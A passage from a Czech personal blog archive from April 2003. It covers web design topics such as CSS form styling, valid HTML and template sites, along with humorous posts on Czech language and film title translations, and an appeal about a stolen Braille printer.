A v neposlední řadě: velkým problémem bude jistě lokalizace. Pokud pominu často do očí bijící zahraniční (až zámořské) reálie a obchodní zvyklosti, i z technického pohledu budou tyto šablony použitelné pro české stránky jen s velkými obtížemi. Připojená písma jsou v západním kódování a cyrilici (sic!) — místo českých znaků se tak zobrazí nanejvýš bukvy azbuky. V HTML kódu stránek se zásadně používají nečeské definice písem (např. Verdana, Arial, Helvetica, sans-serif), se kterými nebude mít zákazník možná problémy na svém počítači ve Windows, ale návštěvníci výsledných stránek už mohou mít potíže ne nevýznamné. Zcela chybí informace o kódování stránky. Celá řada obrázků obsahuje anglické texty (cizojazyčná navigace, "hot news" apod.), pro české stránky by se tyto obrázky musely vyrobit kompletně znovu, což pro laika nebude právě jednoduchá práce a výsledek může být nejistý.

Zkouším si představit, že si pan Vonásek za jednu modrou koupí takovouhle šablonu v dobré víře, že si z ní už sám zvládne vyrobit prezentaci svého truhlářství (ve Windows má přece Frontpage). Už ho vidím, jak se snaží vytvořit nové obrázky ve Photoshopu, ručně dokreslit k textům háčky a čárky, vyexportovat obrázky do optimalizovaných GIFů, nastavit správné kódování, korektní sady písem a předělat úseky stránky pro české reálie...

Všechny tyhle potíže pramení z jednoduchého faktu: celý "projekt" design.stranek.cz je totiž prostou implementací frenchizingového modelu My Template Storage, odkud se také všechny šablony i jejich náhledy stahují. Z tohoto pohledu je už naprosto jasné, proč nabízené šablony vypadají, jak vypadají a proč v nich chybí byť náznak české lokalizace.

Proto mám jedno malé upozornění: pokud by přece jen možnost pořídit si prefabrikovaný web někoho zaujala, měl by vědět, že v rámci sítě My Template Storage je provozována podobných implementací celá řada. A některé z nich nabízejí daleko širší sortiment: především tu najdete i velkou sbírku šablon zdarma, k bezplatnému stažení a používání. A mezi nimi také řadu šablon poměrně obecných, ne s tak křiklavým rukopisem původního autora, u nichž shoda se vzhledem konkurenčního webu nebude tak markantní (viz např.: Freelayouts.com).

Na podobné služby si každý jistě udělá vlastní názor, mně to ale přijde jako pěkná zhůvěřilost. A jedna perlička na konec: Potřebuje vaše firma logo? Žádný problém, už i ta se dnes prefabrikují.

Pozn.: rád bych upozornil, že odkaz na web design.stranek.cz mi poslal sám jeho autor s tím, že by byl rád, abych o něm něco zajímavého napsal. Myslím, že jsem tak učinil — přesto ale nabízenou odměnu (slevu na nákup některého designu) s díky odmítám.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (17)


Pátek, 11. duben 2003

Webdesign
16.34

CSS: Stylování ve formulářích

Užitečné prvky fieldset, legend a label lze pomocí CSS snadno formátovat. V ukázce je příklad jednoho z možných stylů.

Formulářové prvky fieldset, legend a label jsou užitečné především ze sémantického hlediska a pro vytváření dobré struktury dokumentu. Fieldset umožňuje sdružit skupinu prvků patřících k sobě a jeho potomek legend určuje nadpis této skupiny. Prvky label pak vytvářejí vazbu mezi formulářovým prvkem a jeho textovým popisem (návěštím). Ve většině prohlížečů je navíc label klikací, takže např. zaškrtávací políčka (checkboxy) lze zaškrtnout i kliknutím na sousední text.

Tyto prvky lze ale také stylovat pomocí CSS. Prvkům fieldset můžeme např. určit jiný rámeček, okraje a výplň (padding), jejich legendu lze zobrazit v rámečku či s jiným pozadím. A především si můžeme vyhrát s návěštími label — pokud z nich například vytvoříme plovoucí prvky o stejné šířce (s textem zarovnaným doprava), můžeme snadno formátovat formulář obdobně, jako se to jinak dělá tabulkami. (Upozorňuji, že proti používání tabulek ve formulářích v zásadě nic nemám.)

Malý příklad formátování prvků fieldset, legend a label uvádím na samostatné stránce.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (9)


Čtvrtek, 10. duben 2003

Webdesign
17.25

Novinka: komentáře

Původně jsem komentáře ani nechtěl, co mi má kdo kecat do mých blogů. Jenže stále častěji je začínám postrádat — především, když kolem interblogově probíhá nějaká odbornější diskuse. Proto jsem už neodolal.

Editor Bloxxy je nyní obohacen o jednoduché diskuse a nadále je možné příspěvky v těchto blozích komentovat.

Je celkem možné, že to ještě omezím, abych si mohl vybrat a komentáře povolit jen u některých příspěvků — ale s největší pravděpodobností to nechám tak.

Stávající uživatele Bloxxy prosím o trpělivost, veřejná verze s diskusemi bude dostupná až později.

Doufám, že komentáře tady budou víc k užitku než k zlosti. Nerad bych je zase vyhazoval ;) Vkládání komentářů neumožňuje používat žádné HTML ani speciální příkazy — vkládá se pouze holý text, enter dělá nový odstavec, adresy začínající http:// a ftp:// jsou rozpoznávány a vloženy jako odkaz.

Update 11.4.2003, 11:55 — Přidal jsem také jednoduchoučký přehled nejnovějších komentářů, odkaz na něj je i na úvodní straně blogů.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (9)


Středa, 9. duben 2003

Webdesign
22.44

Kolik je potřeba blogerů k výměně žárovky?

Tak schválně. Správná odpověď je mezi ostatními.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Čeština
19.10

Frikulíni, hambajové a ukurehec

Ve vosí diskusi jsem objevil nádherný termín. Frikulín — aneb ten, kdo je free, cool a in. Maně mi to připomnělo podobné ptákoviny, které mě napadaly už kdysi dávno a prakticky hned jsem na ně zase zapomněl. Třeba hambaja (happy MBA yuppie), fofrskej (fotogenický free skejťák), nebo ukurehec (úplně cool reklamní herec). Takovéhle blbinky si obvykle nechávám jen pro sebe, dnes mi ale přišla vhodná příležitost se o ně podělit (pravda, na frikulína to nemá).

Tyhle veselé novotvárky svědčí o tom, jak dotyčné máme rádi, obdivujeme je a bytostně toužíme být jako oni, že.

A když na nás blýskne nějaký ten rex (reklamní ksicht) svým zářivým chrupem, nemůžeme odolat a hned běžíme koupit ten Kolgejt Extra Kúúl Vajtenynk a aspoň deset balíčků Super Ultra Tenkých Ólvejs. Jen co je spořádáme, určitě se znás taky stane další úžasný hambaja.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (6)


Webdesign
11.25

Stručný souhrn příspěvků

Je vytváření stručného výcucu z obsahu u příspěvků v blogu užitečné? Myslím, že ano, a začínám to používat.

Marek přišel na Sově s nápadem přidávat k příspěvkům v blozích krátké souhrny obsahu. Přijde mi to jako výborný nápad, hlavně u delších příspěvků (ne vždy je to smysluplné, někdy to navíc může zkazit pointu příspěvku — má-li nějakou, ovšem).

Přišlo mi to navíc vhod, protože tím můžu vyřešit i svůj starý problém s automatickými popisy příspěvků v Bloxxy, který pro správu svých blogů používám. Zatím se totiž vytvářely celkem tupě z celkového obsahu (např. včetně titulků). I zapracoval jsem do Bloxxy jakousi správu těchto souhrnů a najednou je to celé i pro mě přehlednější. A výsledné seznamy příspěvků taky (viz např. přehled blogů či export do RSS).

Nadále se tedy budu snažit — alespoň u některých příspěvků — dělat i tyto souhrny. Myslím, že to může být k užitku věci. A děkuji Markovi za nápad.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Čeština
09.00

Televizní okénko

Nevím, jak koho, ale mě vždycky děsně drtí ty úchvatné české "překlady" názvů zahraničních filmů. Jistěže: někdy doslovný překlad není možný, někdy je název slovní hříčkou a je pak lepší vybrat úplně jiný název, shodný s původním aspoň významem, vypovídací hodnotou. Většinou se s tím ale v našich distribucích a televizích (hlavně těch soukromých) vůbec nepářou a názvy, které se jim prostě znelíbily, vyrábějí nově jak na běžícím pásu: tu úplně jiné podle obsahu filmu bez ohledu na originální název; nebo dokonce úplně mimo, pokud možno co nejpodobnější něčemu jinému — hlavně pro dobrou možnost záměny s jiným známým filmem (ukázkovým příkladem je třeba Prci, prci, prcičky).

Přitom i název je součástí celého díla a podléhá autorskému zákonu... S tím si u nás ovšem nikdo hlavu neláme — před pár týdny jsem zkouknul nějaký film na Nově a docela mě vyděsilo, jak nakládají se závěrečnými titulky — nebudu to popisovat, většina to asi zná. Já z toho byl perplex... Takže co by si ještě někdo trhal žíly s dobrými překlady názvů filmů a seriálů, že. Vybírám namátkou z TV programu na týden 14. až 20. dubna.

  • Burani ve městě (Nova, Po 20.35) — The Out-Of-Towners — doslova lidé z periférie, případně (obchodní) cestující, pendleři, lufťáci
  • Tucet špinavců: druhá mise (Prima, Po 22.00) — The Dirty Dozen: The Next Mission — tedy "Další mise", ne druhá
  • Světlo mého srdce (ČT2, Út 23.55) — Grace of My Heart — tedy půvab, důstojnost, milosrdenství, slitování, prosím — ale světlo?
  • Tygr a drak (HBO, Út 20.00) — Crouching Tiger, Hidden Dragon — tenhle film jsem tehdy po Oskarech hledal v databázi a celkem marně; hlavně proto, že původní název se u nás člověk nedozvěděl ani náhodou. Nevím, co oprávnilo české distributory osekat takhle název z původního (řekněme) Přikrčený tygr, skrytý drak... Český název z děje nemáte šanci pochopit, ten původní už daleko spíš.
  • Sophie Flemingová: Krásná smrt (Nova, St 23.00) — Fleming III: Wer schön sein will, muss sterben — tedy, Kdo chce být krásný, musí zemřít
  • Tichý nepřítel (Prima, St, 22.25) — The Devil's Own — tedy asi Ďáblův majetek, Ďábel sám atd.
  • Dračí doupě (HBO, St 22.00) — Dungeons & Dragons — to je pravda trošku kapitola sama pro sebe. Všem Pánům Jeskyně je to jasné, ale ostatní nepochopí...
  • Statečný princ donegalský (Nova, Čt 9.55) — The Fighting Prince of Donegal (no comment)
  • Touha smrti III (Nova, Čt 23.00) — Death Wish 3 — trochu z jiného soudku: smyslupněji spíš Touha po smrti
  • Ozvěna smrti (Nova, Pá 21.35) — Water Damage — to je možná nějaká obsese smrtí; doslova je to Poškození vodou, ale neznám obsah...
  • Smrt v buši (Prima, Pá 22.00) — Backlands — tedy Samoty, Zapadákov apod. Vždyť říkám: obsese. Mám pocit, že na českých televizích je slovo smrt častější než na té nejakčnější americké stanici.
  • Druhá nebo první (ČT1, So 21.15) — Stepmom — pravda, trochu slovní hříčka; zdrobnělé, něžnější označení nevlastní matky (něco jako Maceška). Ale třeba Nevlastní maminka by myslím byl celkem přesný překlad.
  • Vliv těla (Nova, Ne 0.50) — Body of Influence — to je velmi podařené, protože doslovný překlad je Tělo vlivu :D
  • Rodinné prokletí (Prima, So 13.00) — Above Suspicion — tedy Mimo podezření
  • Kdo seje zlo (Prima, So 22.40) — Preston Tylk — no comment
  • Quinnův případ (Nova, Ne 23.35) — Mighty Quinn (Mocný Quinn)

To je jen zlomek z jednoho týdne. Ovšem korunu nasazuje ČT1:

  • Kytička pro Algernona (ČT1, Ne 22.20) — Flowers for Algernon. Kdo zná Keyssovu předlohu, hned pochopí, že se jedná o další inscenaci Růží pro Algernon. Ve všech českých překladech se totiž používají "růže" a ne květiny a Algernon je ona (myš). Schálně se podívám, jestli z ní v ČT opravdu udělali myšáka. Nebo rovnou potkana. (Viz též odkazy)

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Úterý, 8. duben 2003

Jen tak
11.44

Další změny na pixy.cz

Dokopal jsem se k tomu, abych konečně upravil i další stránky poletující kolem těchto blogů. Aktulizoval jsem především úvodní stránku, doplnil a rozšířil odkazy, doplnil osobní informace a CV a zpřístupnil kdesi zasuté soukromé stránky s různými veselostmi. Nadále již není přístupný prohlížeč RSS, protože hned několik jiných webů to dělá podstatně lépe a užitečněji.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Neděle, 6. duben 2003

Jen tak
23.45

Hledá se hyena

Kamarádce se nějací gauneři vloupali do bytu a odnesli "elektroniku v hodnotě mnoha desítek tisíc korun." Jak pravili citliví policisté (dorazivší po pěti hodinách), to ještě nic není, bývá to i o hodně víc... Holt (někteří) policajti jsou prostě krávy nebeské a krade se pořád a všude. Což o to. Jen kdyby tou "odcizenou elektronikou" nebyly oči té dívky. Je totiž slepá a nejcennější částí, kterou zloději odnesli, byla speciální braillská tiskárna.

Jedná se o poměrně velké a těžké zařízení sloužící k tisku textů ve slepeckém písmu. A protože lupiči evidentně nerozuměli ani počítačům (například vyrvali VGA kabel z počítače, aniž povolili šroubky, které jej tam drží) — natož aby znali speciální slepecké vybavení, nedokážu si nejak představit, co s tou tiskárnou budou dělat (který bazar jim za ni co dá, kde ji udají?) — zatímco ona okradená kamarádka je bez ní při svém studiu dost bezmocná...

Vyzývám proto kohokoli: pokud někde potkáte braillskou tiskárnu INDEX EVEREST, případně dokonce v kombinaci se skenerem Canon (v bazaru, v inzerátech, setkáte se s nabídkou na prodej — především v Kladně, Praze a okolí), dejte co nejdříve vědět buďto mě (pixy@pixy.cz, tel.: 602.120.547) nebo kterémukoli oddělení Policie ČR.

Děkuji všem za jakoukoli pomoc. Případného nálezce nemine odměna.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (1)


Sobota, 5. duben 2003

Jen tak
20.27

Změna stylu na těchto stránkách

Na základě připomínek několika čtenářů jsem vyměnil styl pro vzhled těchto stránek: jako výchozí je nyní "šedo-červený" vzhled, původní jedovatý "zeleno-růžový" se přesunul na jeho místo jako styl alternativní. V přepínání stylů se nic nezměnilo — pokud vám ten "jedovatý" vyhovuje víc a máte v prohlížeči Javascript a cookies, stačí si styl přepnout a vše bude zase jako předtím. Pozn.: V MSIE ve Windows, který s cookies nakládá tak trochu po svém, možná budete muset změnit styl víckrát: postupně samostatně v každé sekci.

Přece jen není vhodné, abych na čtenáře, kteří mně ani neznají, působil jako notně zhulený student ;)

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Pátek, 4. duben 2003

Lampárna
11.27

První obecní web podle W4D!

Blahopřeji obci Bludov, gratuluji jim k osvícenému webmasterovi Michalu Kutilovi a jemu osobně děkuji. Mě samotného tyhle stránky těší především proto, že v praxi ukazují, že DogmaW4 není jen samoúčelný blábol, ale opravdu pomáhá vytvořit přístupný web.

Nepopírám, že grafika není tak docela můj šálek čaje, ale to není ani trochu podstatné — je kompletně v CSS, takže se dá vypnout, nahradit, upravit... Co ale rozhodně doporučuji ke zhlédnutí — a především všem webmasterům webů státních a obecních institucí — je stránka Dokumenty. Takhle se to má dělat, pánové a dámy. :)

Mám z Bludova opravdovou radost.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (7)


Webdesign
11.02

Nové ikony

Předělal jsem konečně ikonky na koncích těchto stránek. Vesměs mají jen 183-202 bytů a jsou komukoli k dispozici.

Valid XHTML 1.0! Made with CSS 2.1 RSS export Made to DogmaW4 Powered by Bloxxy

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Jen tak
09.11

Fajn reklama

Nenávidím Jáma Boardshop (opraveno: původně Workshop). Minimálně hodinu co hodinu, denodenně, už nejmíň měsíc mi řvou z rádia do ucha svou odpornou, hnusnou, vlezlou reklamu. :[ Někdy už radši rádio ani nepustím, co kdyby tam zrovna byla. Nenávidím je. Kdybych šel někdy náhodou kolem (V jámě 2, tam to je), tak se pozvracím. Dovnitř by mě dostali leda s motorovou pilou. Nenávidím je. Opravdu super reklama.

Update: tak už vím: boty to jsou, boty. Nenávidím jejich boty.

Update 2: tak už vím víc. Prý je to boardshop, ne workshop. Tím hůř. Tomu chlapovi v reklamě je tím pádem rozumět jak Číňanovi... Výborná brandová reklama... Tak to je asi určená výhradně snowborďákům, kteří ví přesně, která bije... Ovšem nejsem si zrovna jist, jestli je Rádio Beat zrovna to pravé médium pro cílovou skupinu teenagerovskej boarďáků a sketjťáků... No nic. Tak holt nenávidím jejich boardy. To je jedno.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Středa, 2. duben 2003

Lampárna
18.58

Profibanka.cz — Profi? Profi?!!!?

Profibanka.cz je patrně e-bankingovým produktem Komerční banky. Proč patrně? Inu proto, že kromě načtení úvodní obrazovky se víc dozvědět nemůžu. Je tam jeden barevný obrázek vedle druhého, všechno se pěkně hýbe, ale po kliknutí na cokoli se stane tohle:

Nic.

Fajn, ne? Jen jeden jediný z odkazů je funkční: přihlášení do systému "mojebanka". A výsledek? Přiznám se, že celkem očekávaný. Ať se jde KB s takovým přístupem bodnout. Zlatá eBanka.

Použitelnost: 0/10 :[

Vložil Petr Staníček - Trvalý odkaz - Komentáře (2)


Jen tak
16.12

Česká televize už dočista zmagořila

Na ČT2 běží přenos ze sněmovny. Poslanci se hádají, jestli odvolají RRTV nebo ne a vůbec předvádějí jiné taškařice. Je to celkem dobrý sitcom. Ale co mě vážně dostalo: kdykoli někdo domluví, vstoupí do přenosu komentátor a několika slovy shrne, co ten člověk před chvílí řekl. A střídají se na tom dokonce dva moderátoři... No ještě že je máme — vždyť já bych trouba jinak vůbec nepochopil, co tam ti lidi říkají!!!

Netuším, čí hlava tohle vymyslela, ale měla by se pozlatit. Zaživa.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Webdesign
11.29

Zase třísloupcový layout...

Na PositionIsEverything vyšel zase další pokus o třísloupcový layout (via Marek). Nevím, kdy ty lidi přestane bavit pořád vymýšlet další a další složitosti, jak naroubovat CSS na staré tabulkové postupy — když se přitom s CSS dá dělat tolik věcí, úplně jinak, s možnostmi, o kterých se tabulkářům může jen zdát...

Ale když už to prezentují a když už jim ani nezáleží na pořadí oblastí v kódu (aby to bylo ideální, měly by oba sloupce následovat až za středním, abvykle hlavním obsahem) — tak tenhle příklad zase všechno zbytečně komplikuje. Nemůžu se zbavit dojmu, že všechny ty použité hacky a nepřehledné šílenosti jsou úplně zbytečné a jen mlží. Navíc pozicují levý sloupec absolutně, takže když bude moc dlouhý, už pod to nic nedáte... Přitom takřka stejná věc se dá udělat jednodušeji, bez jakéhokoli pozicování a IMHO prostě líp. Určitě to jde mnoha způsoby, jistě někdo najde spoustu lepších — moje řešení mi zabralo asi půl hodiny. A funguje to prakticky všude (testováno v IE5/Win95, IE6/WinXP, Opera7/WinXP, IE5/Mac, Mozille, Safari a Caminu).

Naprosto chápu, že spočívá-li propagace CSS v neustálém vrtání v podobných potominkách, dokáže to znechutit všechny, kteří právě přemýšlí, jestli teda tabulky jo, nebo teda zkusit to CSS... Daleko víc by prospěly kretivní ukázky dalších možností CSS, které s tabulkovým layoutem ani srovnání nesnesou. Já jsem bytostně přesvědčen, že s CSS se dá udělat cokoli a neustále dokazovat, že se dá udělat taky něco, co se zatím dělalo jen tabulkama, je zbytečné a samoúčelné nimrání v podružnostech.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (15)


Webdesign
09.48

Ad nový design Atlasu

Věřím, že se i Sova pečlivě zúčastnila testování použitelnosti nového vzhledu portálu Atlas.cz. Je jen škoda, že tam autor v předpisu CSS použil bloky @media, které (dodnes nechápu proč) nepodporuje MSIE/Mac. Takže na Macu holt máme "smůlu" — zobrazí se jen holé HTML. Výsledek je sice i tak přehledný a dá se používat bez problémů, ale na pohled to žádná slast není. Nu což, stejně na Atlas nechodím, takže mi to žíly netrhá ;)

P.S.: Ale font-family: Verdana by se tam fakt objevovat nemuselo, když už si s tím dali takovou práci...

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Jen tak
09.39

Bye-bye, Atomz

Po Bloggeru dávám sbohem taky vyhledávači Atomz. Došlo mi, že přece vůbec nemusím trpět nechopností blbého vyhledávače, který navíc indexuje stránky jen jednou za týden, když je tady přece Google. Takže ode dneška sem nasazuji Googla.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Webdesign
00.12

Kaskádová samohana

Marek má vždycky spoustu užitečných nápadů, tentokrát mi to ale přijde docela mimo. Nahrazuje ikony W3C konstrukcemi text+CSS. Přijde mi to jako blbost.

Nahradit 300bytovou ikonu symbolicky zobrazující vyhovění standardu (např. XHTML 1.0) s alternativním textem "Valid XHTML 1.0!" nicneříkajícím a matoucím textem "W3C XHTML" doplněným 800bytovým kódem CSS je IMHO kontraproduktivní krávovina. Jediný účel vidím v "hele mami, bez držení!", ale z praktického hlediska je to jen kaskádová onanie. Anebo aprílový žertík, ovšem hlubokomyslný až příliš. Sorry, Marku... :/

P. S.: Menší (datově) ikony než tyhle už asi nejdou...

Vložil Petr Staníček - Trvalý odkaz - Komentáře (3)


Úterý, 1. duben 2003

Webdesign
18.06

K čemu je validní kód HTML?

Validní kód stránek je pro mě důležitý. Není samospásný. I s validním HTML lze udělat neuvěřitelně prasáckou stránku — a vice versa. Ale hlavním (ne-li jediným) přínosem toho, že stránku vytvořím podle nějaké existující specifikace jazyka, je právě to, že jsem ji nevytvořil v nějakém jazyku, který de facto neexistuje.

Bájná vsuvka

Byly doby. Jó doby byly. Kdy bylo prohlížečů hromada, každý uměl něco jiného, všechny uměly málo a byl v tom hokej. Pak bylo dlouhé období, kdy zůstaly prakticky jen NN s MSIE po boku. Zbytek se škubal v křečích kdesi v nejzazších peleších za okrajem zájmu. NN si vytvořil vlastní HTML (v každé verzi jiné), Microsoft jakbysmet. Po pár letech se každý autor naučil používat takové konstrukce, které fungovaly jakž takž v obou majoritních browserech. Anebo vše dělal dvojmo (div+layer, marquee+javascript atd.)...

Pak NN umřel a MSIE se rozvalil jak tučné prase po trhu. Zůstala jen jedna verze pseudo-HTML, sice nikde nedokumentovaná, ale kolující navzájem mezi webdesignery v konferencích a popisovaná slovy staršinů při večerních ohních. MSIE byl prohlášen svatým, Jeho jméno bylo Devadesátprocent a Document.All byl jeho prorok.

A pak se odkudsi z díry pomalu vysoukala Mozilla, v hubě zbytky kůže starého Netscape, z níž se vyklubala. V prackách tmavomodrý prapor W3C, za zadkem káru s nákladem DOM. A smečku malých mozilátek v patách. Z dalších děr začali vykukovat malí konkveroři a operky a lízali rány kolem se povalujícím polomrtvým lynxům. Mezitím se všechny potvory rozhlédly po kraji a slezli se na nejvyšším kopci a spatřili širé obzory.

Viděli svůj malý ostrov, skoro celý pokrytý štětinatými špeky vepře MSIE. Všude kolem se však z hladin pomalu nořily stovky dalších ostrovů a z nich na ně mávaly kapesní počítače, mobily a přístrojové desky aut. Nedaleko se rýsoval rozlehlý kontinent Informačních Systémů a v dáli se pohupovalo cosi, co matně připomínalo ledničku. Různými směry se vydali k okolním krajům a brzy vytvořili čilý ruch mezi ostrovy, na lodích s vlajkou W3 a motorem typu DOM. Brzy se mezi nimi začalo hemžit spousta malých vepříků, ale všichni jsou teď natřeni na tmavomodro a roztomile kníkají: Wcag!, wcag!

Zpátky ze zoo

Taky jsem kdysi vzýval to zlaté prase Devadesátprocent, ale to už mám nějakou dobu za sebou.

Dnes je pro mně nepohodlné a nepříjemné vytvářet nevalidní HTML. Proč? Protože o něm můžu říct přesně, jak se zobrazí řekněme v MSIE 5.5 SP1 ve Win98 CZ SP2. Ale o MSIE 6 ve WinXP už vím podstatně méně, na vzhled v Mozille a Opeře se musím podívat a co se týče ostatních browserů, můžu jen doufat. Ale nevím. A když někde něco nefunguje, musím bastlit a dolaďovat jednotlivé kousíčky stránky podle chování všech jednotlivých browserů. A ladit a ladit.

Když ale udělám stránku podle (řekněme) specifikace HTML 4.01 Strict a CSS 2.1 a někde něco nefunguje, podívám se nejdřív do validátoru. A tam zjistím, že jsem třeba překřížil dva prvky. Opravím to a najednou to funguje. Nestarám se už o prohlížeče.

Vážně.

Když dělám nějakou stránku, dělám ji od boku s validním a standardizovaným kódem a nic neladím. Prostě to napíšu, případně opravím kód podle validátoru (to když se někde seknu) a je to. Jasně, zkontroluju to v náhodně vybraném prohlížeči a v 99 % případů je to OK. A vím, že je to taky OK ve všech ostatních (až na malé výjimky a známé chyby — ale to jsou chyby prohlížečů oproti specifikaci, a ty postupně mizí).

Dneska už ladím v různých prohlížečích jen velké projekty, kde si vymýšlím spousty vymyšleností a neobvyklostí, které jsou někde na hraně podporovaných standardů. Ale pokud dělám nějakou běžnou stránku, jednodušší web, už dávno nic ladit nemusím. Stačí mi validní kód. Když je validní, snáz se hledají případné chyby a veškeré ladění nahradí zběžná kontrola.

Nikomu necpu, aby to dělal taky. Za sebe jen můžu říct, že když jsem si včera vytvářel aprílové stránky, úmyslně přímo anti-validní, byl jsem z toho úplně groggy. V půlce prohlížečů to dělalo brykule, část blbůstek jsem musel vyhodit, část kódu ručně doopravit a vůbec jsem se v něm nevyznal... K tomuhle že bych se měl někdy vrátit? Ani za zlatý tele.

Suma sumárum? Nevalidní kód je předvídatelný pouze v omezené skupině prohlížečů. Jeho chování si musím ověřit v několika prohlížečích, o chování v těch ostatních, které nemám, nedokážu nic říct. Čili jeho chování je nepředvídatelné, protože není nikde řečeno, jaké má vlastně být. Validní kód proto za mně dělá veškerou práci s laděním ve stovkách různých browserů a zařízení. Jeho chování je totiž nejen předvídatelné, ale dokonce normativně předepsané. A úroveň podpory těchto norem roste před očima.

Pro mě je prostě používání validního kódu pohodlnější, neskonale snazší a příjemnější. Ale každému jeho prase...

Vložil Petr Staníček - Trvalý odkaz - Komentáře (1)


Apple
12.06

Jadýrka z jablek, 1. 4. 2003

Nová verze (3.2.10) LaunchBaru. O téhle skvělé věci, bez které už bych se ani nemohl posadit k počítači, jsem podrobněji psal na MujMacu. Vřele doporučuju každému *** Apple vypustil aktualizaci QuickTime 6.1.1, která má řešit chyby při streamingu MPEG-4. Instalace je přes SoftwareUpdate, má 19.4 MB (!) a víc než opravu chyb od ní nečekejte. *** Panther (aka OSX 10.3) se očekává začátkem léta (snad 23.-27. 6. na WWDC). Co přinese nového, se usilovně tutlá.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (1)


Apple
11.21

BBEdit 7.03 a kódování češtiny

Tak mám konečně BBEdit 7. A vrním blahem. Jako nenápadný setinkový update ve verzi 7.02 sem přidali v Barebones nativní podporu pro všechna možná kódování. To je možné určit jednak explicitně, ale především si BBEdit sám parsuje kódování definované v HTML dokumentech, takže je-li tam třeba zapsána meta-značka obsahující charset=iso-8859-2, stránka se překóduje z ISO2 do MacCE, edituje se normální čeština a při ukládání se vše překládá zase hezky do ISO2. Jeden se už nemusí o nic starat. V kombinaci s funkcí Edit in BBEdit ve většině FTP klientů je s tím pak dvojnásob radost pracovat.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (1)


Jen tak
11.09

Dosť bolo aprílov

Tak nic, nebyl jsem originální, zas tak veselé to taky nebylo. Takže konec. Ha, ha, ha, že. Pokud se někomu moje dnešní stránky líbily a postrádá je, na chvíli tu schovám úvodní stranu blogů a Web blog.

A když nic jiného, je to pěkná ukázka toho, jak jsem taky kdysi dělával weby. Fakt že jo — ale kdysi a hodně dávno... A týká se to spíš kódu než výsledku; ale byla to stejně hrůza... :)

Jen pro vaši informaci: ty stránky byly vytvořeny v nejnovější verzi Adobe Golive. Já vím, proč nemám rád ty wysiwyg editory...

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Archiv tohoto zápisníku


 RSS 0.9x  Export  RDF  Export  RSS 0.9x  Komentáře  TXT  Komentáře  XHTML 1.0  Validate  W3C  CSS 2.1  Em-web  Resizable  W4D  90% dogmatic

Vygenerováno: 2005-05-10, 11:43 CET